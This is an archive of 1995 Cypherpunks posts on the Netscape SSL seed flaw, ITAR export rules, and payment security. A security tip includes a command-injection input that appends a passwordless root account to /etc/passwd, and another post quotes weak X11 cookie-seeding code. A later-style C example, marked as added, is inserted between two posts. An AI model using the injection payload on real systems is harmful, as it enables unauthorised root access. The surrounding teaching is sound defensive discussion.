Date: Thu, 21 Sep 95 05:33:39 PDT
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
Message-ID:

At 4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
>You have excellent points in your detailed answer, thank you, but

Thanks. I'm glad to be able to conduct this discussion at a cordial and intelligent level.

>If FV was as used as SSL could be, what prevents, to use your terms,
>someone to get MILLIONS of FV's identifiers and use each one only
>once, etc ... (imo your figures about SSL and crypto softs risks are
>over evaluated, so I over evaluate the 'risks' of yours using same
>assumptions)

I think you still don't get it, Laurent. If you intercept millions of credit cards, you immediately have something very valuable and untraceable. An FV-ID is much less useful than a credit card number, because it only works with email confirmation and only works on the net. And merely intercepting them doesn't get you anything -- you have to be able to answer the confirmation messages, which is much harder to do "en masse" than passively sniffing for things (and possibly then decrypting them). And a scheme that also replies to such messages is far more likely to leave traces by which the criminal is caught.

In other words, when you look at the "millions of interceptions" case, the value of doing this is lower for FV, the difficulty of automating it in the large scale is higher, and the risk of detection is higher, as compared with a one-way scheme that transmits credit cards, whether encrypted or not.
>There can't be more security by transferring data on the clear
>compared to an encrypted one... except maybe that people using
>encryption can often feel overconfident.

Of course there can, if you're not talking about the same data, which we're not. It's much safer to transmit something without high intrinsic value in unencrypted form than to transmit something with high intrinsic value in encrypted form. That's why FV-ID's were designed the way they are -- low intrinsic value, easy to revoke & reissue, etc. By analogy, it is safer to send a weather report unencrypted than to send detailed instructions about nuclear weapons encrypted.

>So, as someone pointed out,
>it is not that much a problem about CC# which are available easily
>anyway, but in fact, using encrypted communications is the only way to
>ensure (some) *privacy*, in addition to being a security improvement.

Also not true. A scheme like FV's gives a fairly high privacy level through the use of pseudonyms. Your FV-ID can be traced to you *only* by FV, and we won't hand out that information without a court order.

>financial insecurity never was a problem as
>long as it remains under a small %.

This is an amazing statement, Laurent. It's sort of like saying that building a city in the middle of a flood plain isn't a problem as long as there isn't a flood. You can't dismiss even a low-probability disaster if the consequences of the disaster are extremely high. If the SSL bug had been discovered AFTER there were hundreds of millions of credit cards being transmitted via SSL, and if the person who discovered it had criminal intent, the entire global credit card infrastructure really would have been endangered. Personally, I'm always suspicious of any claims to have "fixed the last bug", so I don't see any reason to assume this isn't inevitable in the long run if a scheme like SSL is used.

>Anyway, if you have happy customers, good for you...
>I'd suggest that
>you'd use "Security through Clarity" as motto ;-)

That's not a bad motto. I'd prefer to describe our system as focusing on practical, comprehensive security rather than chasing the myth of perfect cryptographic security. (For example, we've probably put more effort into making our server secure from breakins than just about any other site on the Internet.)

We're not opposed to cryptography, by the way. There are some obvious places where the use of digital signatures could directly enhance our system, and we're pursuing them. It has also not escaped our notice that, even though we strongly believe that transmitting FV-ID's in the clear is safer than transmitting credit cards encrypted, it would be safer STILL to transmit the FV-ID's encrypted -- sort of the best of both worlds. And you can count on our doing that when there is a good Internet infrastructure for doing so, which we don't yet believe to be the case.

-- Nathaniel

From rsalz at osf.org Thu Sep 21 05:36:10 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 21 Sep 95 05:36:10 PDT
Subject: Please send me SSL problems...
Message-ID: <9509211235.AA20792@sulphur.osf.org>

>None of these organisations have mentioned GSSAPI to me.
>Do you have a source?

Digital: ask John Wray.
IBM: find someone in the DSOM group
HP: no name I can give.

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:07:41 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Thu, 21 Sep 95 06:07:41 PDT
Subject: Munitions shirt (again)
Message-ID:

Timothy C. May writes:

: At 3:49 PM 9/20/95, Ian Goldberg wrote:
: >So, Dave and I got free munitions shirts (they're different, though;
: >the font is smaller and they have a bunch of X'd out Constitutional
: >Amendments on the back; I think they were designed by Joel Furr) for
: >our bug find.
: >
: >So I'm wearing it today. The thing is, I live in International House,
: >a residence that has 50% non-Americans.
: >
: >So, any consensus as to whether it's actually illegal to do so? I
: >remember some disagreement a few weeks ago that AFAIK wasn't resolved.
:
: The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
: of non-Americans," judging by the comments here.

Assuming that the International Traffic in Arms Regulations are the law (rather than the unconstitutional silliness that they actually are), this consensus is correct. The ITAR forbid the ``disclosure'' of cryptographic ``software''--very broadly defined--to ``foreign'' persons ``within or without the United States.'' It says nothing about the medium of the disclosure: whether it is a T-shirt or computer screen.

: The _reality_ is quite different, I think, and the "this shirt is illegal"
: hype is, in my opinion, just that, hyperbole. Even hyperbull, too.
:
: Books and written articles containing crypto algorithms are _not_ illegal
: for "furriners" to look at. The t-shirt contains at most a fuzzy printing
: of an algorithm that has been widely printed in various books and in
: articles in mailing lists like ours.

The fact that the government does not dare to try to enforce the ITAR against those who publish cryptographic software without a license (and the fact that the Office of Defense Trade Controls has waived its jurisdiction to require a license in one case for a book where it retained jurisdiction for a CDrom with the same information) does not mean that it is not a violation of the ITAR to publicly wear a T-shirt with cryptographic software on it; although it does strongly suggest that no one will be prosecuted for such violations. And that is just as well, since the posting on an anonymous FTP server of the C program that cracks the seed for the Netscape security routines is also a technical violation of the ITAR, as even Mr. May will perhaps concede.
The fact that warning the world of this security breach is a violation of the ITAR simply shows how silly--and how dangerous--is the ITAR's licensing scheme for the publication of cryptographic software.

: (I agree that there are some unresolved issues with ostensibly
: machine-readable forms. The t-shirt is not machine-readable by any
: plausible interpretation of machine-readable.)

There is nothing in the ITAR that refers to ``machine-readable'' so there is no need to interpret that term.

- --
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:13:19 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Thu, 21 Sep 95 06:13:19 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca>
Message-ID:

Ian Goldberg writes:

: In article <43qrhf$gd5 at tera.mcom.com>,
: Jeff Weinstein wrote:
: > I think that the general opinion of engineers and management here at
: >Netscape is that it would be A Really Good Thing to have our US-only
: >128+ bit version of Netscape Navigator available for download by US
: >citizens and others who are not legally prohibited from using it.
:
: Who _is_ legally prohibited from using it? I think there are some countries
: where the very use of crypto is illegal (could someone please list them?),
: but who else?
:
: There are some people that may be legally prohibited from _obtaining_ it
: from a US site (ITAR yadda), but even so, if JRFurriner downloads
: crypto from company C's site in the US, who's guilty of ITAR-violation?
: Company C for making it available, or JRF for initiating the action
: that caused the bits to be sent out of the country?
:
: - Ian "my, I seem to be posting a lot tonight"

Probably both have violated the ITAR, but neither will be actually prosecuted.
On the other hand, Company C will be threatened and harassed until it stops making the software available.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From s675570 at aix2.uottawa.ca Thu Sep 21 06:19:13 1995
From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca)
Date: Thu, 21 Sep 95 06:19:13 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID:

On 21 Sep 1995, Jeff Weinstein wrote:

> Poor choice of words on my part. My understanding is that we can not
> export our US-only product, except to canada - for the use of canadian
> citizens. I also believe that it is illegal for anyone except US citizens,
> permanent residents of the US (green card holders) and Canadian citizens
> to use it, even within the US. I'm not a lawyer, and I've not read
> all of ITAR myself, so I could be totally wrong...
>
> --Jeff

And from what the folks at the Export Controls division of the Department of External Affairs in Ottawa told me, Canadians can't export export-controlled American software, including pgp and other freeware, without a license. OTOH we can export non-US-origin software license-free (well freeware for sure, anyway, I didn't get the whole thing quite right). Of course there are a few countries for which you would need a license, and some UN embargoed countries to which you can't make any exports (both sets are dictatorships or warzones, so not much net access anyway and the crypto laws would make France's look cpunk). They're also waiting to see what happens to Phil Z. to decide whether or not ftp's are exports.

All the same, if anyone wants an easy and economical way to get around ITAR, have someone do your crypto software development just north of the border (Vancouver's just north of Seattle and close enough to Silicon Valley, with excellent net-access) or at least just publish it here first.
Phil could have saved himself an immense amount of trouble with a short car ride. You Americans on the list could too. Wanna nag your bosses some more Jeff? You'd be doing everyone a favor and get your wish.

You can get "A guide to Canada's export controls" from:

Foreign Affairs and international trade Canada.
Export controls division
125 Sussex Drive, C-4
P.O. Box 481, Station A
Ottawa, Ontario K1N 9K6
Fax: (613) 996-9933
Tel: (613) 996-2387

Remember to also ask for the "general software note"

For the West Coasters on the list there's also an address closer to home (they have addresses in all the major Canadian cities, if anyone wants to visit them personally, send me a msg and I'll mail you the nearest address)

International Trade Centre
Scotia Tower
900-650 West Georgia Street
P.O. Box 11610
Vancouver, British Columbia V6B 5H8
Fax: (604) 666-8330
Tel: (604) 666-0434

From pfarrell at netcom.com Thu Sep 21 06:28:44 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Thu, 21 Sep 95 06:28:44 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <34057.pfarrell@netcom.com>

thad at hammerhead.com (Thaddeus J. Beier) writes:
> At this point, in this country, a patent is secret until it is issued.

This will change in the US fairly soon. It is fallout of one of the world-wide trade and tariff treaties -- we have to make our patent process be more in line with the rest of the world. One of the big technical challenges that the PTO and PRC have is how to release in-process patents securely. (PRC is the systems integrator for the PTO's APS (advanced Patent System) that had all the text and images of all patents since 1970 online.) They have even talked about putting patents on the WWW, but actually doing it is quite a way off in the future.

Pat

Pat Farrell      Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage          #include

From perry at piermont.com Thu Sep 21 06:33:23 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 21 Sep 95 06:33:23 PDT
Subject: USA Today on Fear of Credit Cards over Net
In-Reply-To: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>
Message-ID: <199509211332.JAA01558@frankenstein.piermont.com>

Randy Catoe writes:
> I'm told that the revenue lost to fraud in the
> credit card industry is around .15 percent of the gross purchase value.

That's a giant amount of money in dollars.

> I'm also told that the credit card companies actually face higher costs
> from disputes, i.e. when you call them up and busy out a person to
> resolve a question on your bill.

Crypto will also reduce that rate, IMHO.

Perry

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Thu Sep 21 06:46:15 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Thu, 21 Sep 95 06:46:15 PDT
Subject: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID:

Jeff Weinstein writes:

: Poor choice of words on my part. My understanding is that we can not
: export our US-only product, except to canada - for the use of canadian
: citizens. I also believe that it is illegal for anyone except US citizens,
: permanent residents of the US (green card holders) and Canadian citizens
: to use it, even within the US. I'm not a lawyer, and I've not read
: all of ITAR myself, so I could be totally wrong...

There is nothing in U.S. law that prohibits anyone from using a cryptographic product, much to the frustration of the NSA, FBI, etc. That is why they try to forbid speaking about it by pretending that communication of information is exporting something. There is a law that forbids exporting munitions without a license and that is the basis for the ITAR regulations.
The funny thing is that a law forbidding the use of cryptography just might be constitutional--though I, for one, am convinced that it would not be--while forbidding communication of information about cryptography without a license is a blatant violation of the First Amendment of the United States constitution.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From rmartin at aw.sgi.com Thu Sep 21 07:01:47 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Thu, 21 Sep 95 07:01:47 PDT
Subject: Canada & ITAR
In-Reply-To:
Message-ID: <9509211000.ZM22513@glacius.alias.com>

[plug plug plug]

If you're impatient, much of the relevant text of the "Canada's Export Controls" booklet is available at http://www.io.org/~samwise/crypto/

frodo =)

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu    http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8    Shad Valley Waterloo 1992

From jgrubs at left.webcasters.com Thu Sep 21 07:18:16 1995
From: jgrubs at left.webcasters.com (Jim Grubs W8GRT)
Date: Thu, 21 Sep 95 07:18:16 PDT
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <0u8RBD2w165w@left.webcasters.com>

"Perry E. Metzger" writes:

>
> Re: The risk of credit cards.
>
> I suppose that indeed there are large risks elsewhere in the credit
> card system. However, I think that the credit card system itself is
> stupid and insecure and ought to be scrapped -- sending around account
> numbers as magic keys to get payment is a stupid move. It's not
> surprising how large credit card fraud is.

Hence the fast growing popularity of those cash cards.

--
WebCasters(tm)                         James C. Grubs
jgrubs at left.webcasters.com
6817 Maplewood Avenue                  Tel.: 419-882-2697
Sylvania, Oh 43560                     Fax:  419-885-2814
Internet consulting, HTML programming, Information brokering

From cme at TIS.COM Thu Sep 21 07:31:48 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 21 Sep 95 07:31:48 PDT
Subject: PRNG state (and conditioning) (was Re: netscape's response)
In-Reply-To: <199509202031.NAA06951@comsec.com>
Message-ID: <9509211428.AA21108@tis.com>

If you are looking for PRNG conditioning code, feel free to snarf code from

http://www.clark.net/pub/cme/html/ranno.html

I'm assuming your new PRNG has enough state (more than 64 bits) that the 128-bit key (or later, larger keys) is worth its bits. I'm assuming you solve the problem of finding enough entropy bits for seeding the PRNG and considering how to keep as much of that entropy as possible in your PRNG seed (rather than, for a silly example, distilling it to an unsigned int for driving rand() ).

For example, the state in ranG (from the giveaway code) or in ranM may not by itself lead to a secure PRNG, but when it drives a one-way function (e.g., ranH, ranD, ranN) the state is still serving a purpose. [ranG keeps 186 bytes of state while ranM keeps 32KB of state.]

 - Carl

From sdw at lig.net Thu Sep 21 08:27:41 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Thu, 21 Sep 95 08:27:41 PDT
Subject: Export via FTP: who's to blame? Ask a court!
In-Reply-To: <9509210737.AA10902@toad.com>
Message-ID:

...
> This is a question that has never been answered by a court.
>
> Personally I think that the Congress can't constitutionally set up a
> scheme that restricts US citizens from communicating with each other
...
> If some hardy soul wants to set up a nice clean situation, like Phil
> Karn did for the paper-vs-magnetic-media distinction, I'm sure we can
> find some more pro-bono (zero cost) lawyers who'll take the case for
> the fun and notoriety. You don't have to break the law to get into
> court; Phil didn't, for example.
> You make a situation where the law
> restricts you, then sue to have the restriction declared invalid. And
> if you have ever been in court, it's a lot more fun being the
> Plaintiff than being the Defendant.
>
> Doing this will take significant time on your part. Even if the
> lawyers do 95% of the work, you have to talk with them, review what
> they write, explain the details in gory detail, and believe in what
> they're doing for you. And sometimes do things in a way that they are
> sure is right, even though you yourself aren't sure. And stick with
> the case even though it would drag on for years through several
> courts. So it's not something to do lightly. But it's worth it. And
> it's a lot safer and easier to enforce your civil rights now, than to
> try to live through the civil war that would follow the slide into
> authoritarian government.
>
> I'd do this case myself, except that I think we should have few single
> points of failure. If we spread the work around, it's more likely to
> happen. And your civil rights are safer, because you yourself have
> learned how to defend them.
>
> John

I recently moved to the DC area (N VA) and might be amenable to a relatively harmless scenario like this. (Not that I have much time, but I'm flexible.)

sdw
--
Stephen D. Williams 25Feb1965 VW,OH (FBI ID)
sdw at lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W
43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From patrick at Verity.COM Thu Sep 21 08:28:18 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:28:18 PDT
Subject: "random" number seeds vs. Netscape
Message-ID: <9509211524.AA17588@cantina.verity.com>

Philip L. Karlton said:
>
> I agree, but I have a hard time arguing with those that assert that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.
>

Why would you have to argue with them? When they say that it's easier to become root from a logged in account tell them, "Good, that's just as it should be!" It's a feature, not a problem!

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
|                                                         (\           |
| Patrick J. Horgan          Verity Inc.                   \\   Have   |
| patrick at verity.com       1550 Plymouth Street           \\ _ Sword  |
| Phone : (415)960-7600      Mountain View                 \\/  Will   |
| FAX   : (415)960-7750      California 94303             _/\\ Travel  |
\___________________________________________________________\)__________/

From patrick at Verity.COM Thu Sep 21 08:30:42 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:30:42 PDT
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID: <9509211527.AA17593@cantina.verity.com>

> Just a note for those who aren't aware, Business Wire is a pay-per-use
> "news release" service. That is, RSA wrote the contents of what Bob
> (Hi!) posted.
>
> The clue is at the bottom of the "story":
>
> CONTACT: RSA
> Kurt Stammberger, 415/595-8782
> kurt at rsa.com
>
> This is not to say anything pro or con about the content of the press
> release; just that it wasn't written by a third party.
>
> /jordan
>

I can't imagine that anyone wouldn't have known that, it was written from RSA's point of view.

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
|                                                         (\           |
| Patrick J. Horgan          Verity Inc.                   \\   Have   |
| patrick at verity.com       1550 Plymouth Street           \\ _ Sword  |
| Phone : (415)960-7600      Mountain View                 \\/  Will   |
| FAX   : (415)960-7750      California 94303             _/\\ Travel  |
\___________________________________________________________\)__________/

From iagoldbe at csclub.uwaterloo.ca Thu Sep 21 08:50:26 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 08:50:26 PDT
Subject: XDM has the same problem as netscape ?!
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <43s1j7$nd3@calum.csclub.uwaterloo.ca>

In article <9509210631.AA18308 at sfi.santafe.edu>, Nelson Minar wrote:
>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>the same problem: the random seed was based on the current time to the
>microsecond, modulo the granularity of the system clock. I think I
>figured that on my hardware, if I could figure out which minute the X
>server started (easy with finger), I'd only have to try a few
>thousand keys or so. Caveat: I never actually proved the idea.

Wow. I just checked, and Nelson's right. The seed is this:

#ifdef ITIMER_REAL
    {
        struct timeval now;
        X_GETTIMEOFDAY (&now);
        ldata[0] = now.tv_sec;     /* seed material is wall-clock seconds... */
        ldata[1] = now.tv_usec;    /* ...and microseconds, nothing else */
    }
#else
    {
        long time ();
        ldata[0] = time ((long *) 0);
        ldata[1] = getpid ();
    }
#endif

and if you don't have XDMAUTH defined, the auth value is this:

    seed = (ldata[0]) + (ldata[1] << 16);
    srand (seed);                  /* libc rand(), driven by that seed */
    for (i = 0; i < len; i++)
    {
        value = rand ();
        auth[i] = value & 0xff;
    }

Oh, well. We knew X didn't have much in the way of security, anyway...

 - Ian

From patrick at Verity.COM Thu Sep 21 08:57:20 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:57:20 PDT
Subject: "random" number seeds vs. Netscape
Message-ID: <9509211553.AA17620@cantina.verity.com>

Perry said:
>
> Also be especially careful about how you run the thing! Don't use
> popen or anything like it!

There's nothing inherently wrong with using popen or system.
The problem arises when you use information given to you from outside as the argument to popen or system without checking it. You should have an awareness that whatever you pass to system or popen is essentially being passed as the commandstring to a:

    execl("/bin/sh", "sh", "-c", commandstring, (char *)0);

Make sure you know the implications of this. If you know that what you're passing can happily be exec'd directly, it's more efficient to do an exec yourself instead of (effectively) having a sh exec'd to exec your code.

Of course you can see that you shouldn't do something like:

    cout << "Enter the directory to list: ";
    cin >> buffer;
    system(buffer);

especially if you're running with any sort of privileges. Suppose someone entered:

    / ; echo >>/etc/passwd "gotcha::0:0:Intruder Man:/:/sbin/sh

Obviously if this program was being run as root you'd be in trouble. If it was running as a user it would let them do something like add an .rhosts for the user that would let them get on the machine. Once on a machine it's often fairly easy to leverage that access into root access.

Oh well, I could talk about security all day:)

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
|                                                         (\           |
| Patrick J. Horgan          Verity Inc.                   \\   Have   |
| patrick at verity.com       1550 Plymouth Street           \\ _ Sword  |
| Phone : (415)960-7600      Mountain View                 \\/  Will   |
| FAX   : (415)960-7750      California 94303             _/\\ Travel  |
\___________________________________________________________\)__________/

From tcmay at got.net Thu Sep 21 09:00:23 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:00:23 PDT
Subject: Netscape is doing well -- give 'em a break.
Message-ID:

At 5:52 AM 9/21/95, John Gilmore wrote:
>All progress is by steps. Let's step on each others' shoulders, not
>on each others' toes. Netscape is doing us a favor by pushing strong
>crypto.
>We are doing them a favor by pointing out problems before
>they cause major losses to Netscape customers. The result is higher
>security for everyone, and more respect for each other's efforts. So
>kindly show them a little...

I agree strongly with John. This whole Netscape thing is good for us, good for Netscape (in the long run), and good for raising the awareness of the importance of strong crypto.

It also underscores the need for "tiger teams" to validate software, much as the Pentium debacle of last fall underscored the need for even more detailed checking of designs.

It's clear now that 1000 ravenous Cypherpunks, or some fraction of them, are eager to "crack" the next big product, and this will hopefully make for better and stronger software.

--Tim May

Notice: With 1000 people on the Cypherpunks list, and many on other lists I am on, nearly every article I write generates at least one question, request for more information, dispute with my choice of words, etc. I have been trying to respond to these, usually privately, but the burden has become too much, and I no longer plan to respond to trivial or ephemeral points. If you don't hear from me, this is why. Some requests for pointers to information will still be handled, but I advise people to learn how to use the archives and/or search tools.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
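The popen()/system() point in Patrick Horgan's post above (whatever you hand to system() is run as `sh -c`, so every shell metacharacter in user input is interpreted as syntax) is easiest to see next to the shell-free alternative he recommends. What follows is an added example, not code from any post in this thread and not X11 or Verity code: a small C program that takes the same "directory to list" input, screens it for shell metacharacters, and then runs ls through fork()/execv() with an explicit argv, so the string reaches the child as one argument and no shell ever parses it. The function names and the metacharacter list are my own choices.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Characters that /bin/sh -c would treat as syntax rather than data.
 * Rejecting them is a belt-and-braces check (list is my assumption);
 * the real fix below is to never hand the string to a shell at all. */
static const char SHELL_META[] = ";|&$`\"'\\<>(){}[]*?~\n";

/* Return 1 if the argument contains any shell metacharacter, else 0. */
int has_shell_metachars(const char *arg)
{
    return strpbrk(arg, SHELL_META) != NULL;
}

/* Run `prog` with the given argv vector directly, with no shell in
 * between. Returns the child's exit status (0 on success), 127 if the
 * program could not be executed, or -1 on fork/wait failure. */
int run_without_shell(const char *prog, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(prog, argv);   /* only returns on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    return -1;
}

/* Safe counterpart of the post's system(buffer): the caller's string
 * becomes exactly one argv element, so "/ ; echo foo" would be looked up
 * as a directory literally named that (and fail), never executed.
 * Returns -2 when the input is refused by the metacharacter screen. */
int list_directory(const char *dir)
{
    if (has_shell_metachars(dir))
        return -2;
    char *const argv[] = { "ls", "--", (char *)dir, NULL };
    return run_without_shell("/bin/ls", argv);
}

int main(void)
{
    char buffer[256];
    printf("Enter the directory to list: ");
    fflush(stdout);
    if (!fgets(buffer, sizeof buffer, stdin))
        return 1;
    buffer[strcspn(buffer, "\n")] = '\0';   /* strip the trailing newline */
    int rc = list_directory(buffer);
    if (rc == -2)
        fprintf(stderr, "rejected: shell metacharacters in input\n");
    return rc == 0 ? 0 : 1;
}
```

The `--` argument is what keeps an input beginning with `-` from being read by ls as an option; together with the explicit argv it means the only thing user input can influence is which directory name ls is asked about. The metacharacter screen is defence in depth, useful mainly for logging and rejecting obviously hostile input early; on its own it is not a substitute for avoiding the shell.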
From nsb at radiomail.net Thu Sep 21 09:05:31 1995
From: nsb at radiomail.net (NSB's Portable (via RadioMail))
Date: Thu, 21 Sep 95 09:05:31 PDT
Subject: [NOISE] "hacker" was: first virtual "security"

At 2:03 AM 9/21/95 -0400, Ian Goldberg wrote:
>In article <0kMA2EqMc50eMEb4Yx at nsb.fv.com>,
>Nathaniel Borenstein wrote:
>>If an SSL-like scheme were in wide use world-wide, the hacker who just
>>made a name for himself by breaking SSL could instead have gone down in
>
>Ugh. That word again. I'm only 22, but I'm old enough to remember
>when there were people called "crackers", and being called a "hacker"
>was a _good_ thing.

Hey, this guy didn't steal anything, and he publicized the hole. He wasn't a criminal, he was a good guy. That's why I called him a hacker.

-- NB

From landon at netcom.com Thu Sep 21 09:14:13 1995
From: landon at netcom.com (Landon Dyer)
Date: Thu, 21 Sep 95 09:14:13 PDT
Subject: FROM A FRIEND . . . (the joys of boating)
Message-ID: <199509211600.JAA10128@netcom19.netcom.com>

>On 21 Sep 1995, Jeff Weinstein wrote:
>> My understanding is that we can not
>> export our US-only product, except to canada - for the use of canadian
>> citizens. I also believe that it is illegal for anyone except US citizens,
>> permanent residents of the US (green card holders) and Canadian citizens
>> to use it, even within the US. I'm not a lawyer, and I've not read
>> all of ITAR myself, so I could be totally wrong...
>
> All the same, if anyone wants an easy and economical
>way to get around ITAR, have someone do your crypto software development
>just north of the border (Vancouver's just north of Seattle and close
>enough to Silicon Valley, with excellent net-access) or at least just
>publish it here first.

here's a possible bullshit wrinkle. i'm not a lawyer, but one of my bosses was, once.

said boss owned a boat that was of canadian registry. he was a canadian citizen with a green card.
he *claimed* that, even when docked in the SF bay area, his boat was technically considered canadian territory, due to some maritime law malarkey. US authorities theoretically had to go through various hoops to legally board his vessel.

i wouldn't try to halt a SWAT team, or even the local fuzz, with this tidbit of legal gaga. but doing crypto development on such a vessel might hold up in court for something as squishy as ITAR.

naturally, commuting to canada is probably a *lot* cheaper than owning a boat. the uninitiated have little idea what these holes-in-the-water really cost.... :-)

-landon (returning to lurk-mode)

From tcmay at got.net Thu Sep 21 09:18:02 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:18:02 PDT
Subject: Entropy vs Random Bits

At 11:50 PM 9/20/95, David Van Wie wrote:
>I've been watching the debate and discussion unfold on usable sources of
>random data from environments, user actions, etc. I have a vocabulary
>question (and something of a bone to pick as a mathematician and physicist).

Well, I was trained as a physicist also, but am completely comfortable with the Shannon definition of information-theoretic entropy. In fact, through my readings about entropy in computations (cites below), I now view traditional thermodynamic entropy as a special case of information theory!

>Usually, the term "entropy" is being used to characterize one of two
>different things: (i) random data, as in "300 bits of entropy," and (ii) the
>"randomness" of data (i.e. high degree of variance in a statistic drawn from
>it), as in "you can find a lot of entropy in the low order bits of a timed
>interval between keystrokes." I suspect that there are other shades of
>meaning intended in other uses as well.
>
>This is odd. The term entropy describes an aspect of thermodynamic
>equilibrium in physical systems. Although sometimes used as a synonym for
>"random," that definition is vernacular, not technical.
>In fact, there is
>no meaningful relationship between "entropy" and random data of the type
>described in the postings related to seed values. In the presence of a
>perfectly suitable and precise mathematical term (i.e. random), why invent
>new terms? Why use them to mean at least two different things?

Entropy has been used with an information theory context since the 1950s, by Claude Shannon and others. I disagree that there is "no meaningful relationship between "entropy" and random data of the type described in the postings related to seed values." The bits of entropy we are talking about are the "bits derived from a physical process or a user action which are effectively from a random process."

(Granted, the internal thoughts of a user swirling the mouse around are not quite as "random" as, say, alpha decay, but for all intents and purposes no "prediction" can be made of the mouse motions, at certain levels of detail, and the bits derived are in fact effectively random. We are not "living in a state of sin," to paraphrase Von Neumann, in using these bits and assuming them to be random.)

Good books on the incredibly fascinating aspects of information theory, and especially algorithmic information theory:

* Cover and Thomas, "Elements of Information Theory." A good textbook on information theory, covering gambling (!), prediction, and the Chaitin-Kolmogoroff outlook.

* Chaitin, Gregory, "Algorithmic Information Theory." A bit dense to read, and Chaitin has written several more popular accounts for "Scientific American" and similar places.

* Zurek, Wojciech, editor, "Complexity, Entropy, and the Physics of Information." This collection of great articles shows the role of entropy in information theory, and why the thermodynamic definition is essentially a variant of the more fundamental information-theoretic definition.

Enjoy!
--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From iagoldbe at csclub.uwaterloo.ca Thu Sep 21 09:35:06 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 21 Sep 95 09:35:06 PDT
Subject: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <43s46q$3qs@calum.csclub.uwaterloo.ca>

In article <199509211130.HAA20039 at light.lightlink.com>, wrote:
>NY Times, Sept 21, 1995.
>
>Fraud Can Flourish Without the Internet
>
>To the Editor:
> [snip]
>
>Or is the banking industry whipping up hysteria among
>purchasers to curb fraud losses? Was the work of those
>graduate students funded by someone -- directly or indirectly?
>If so, by whom? A banking consortium? A high-tech company
>working on some patentable security scheme?

The work we did was not funded by anyone. If someone out there would care to rectify this situation, he can let us know. :-)

- Ian "Grad students are not notoriously wealthy in this country, either, right?"
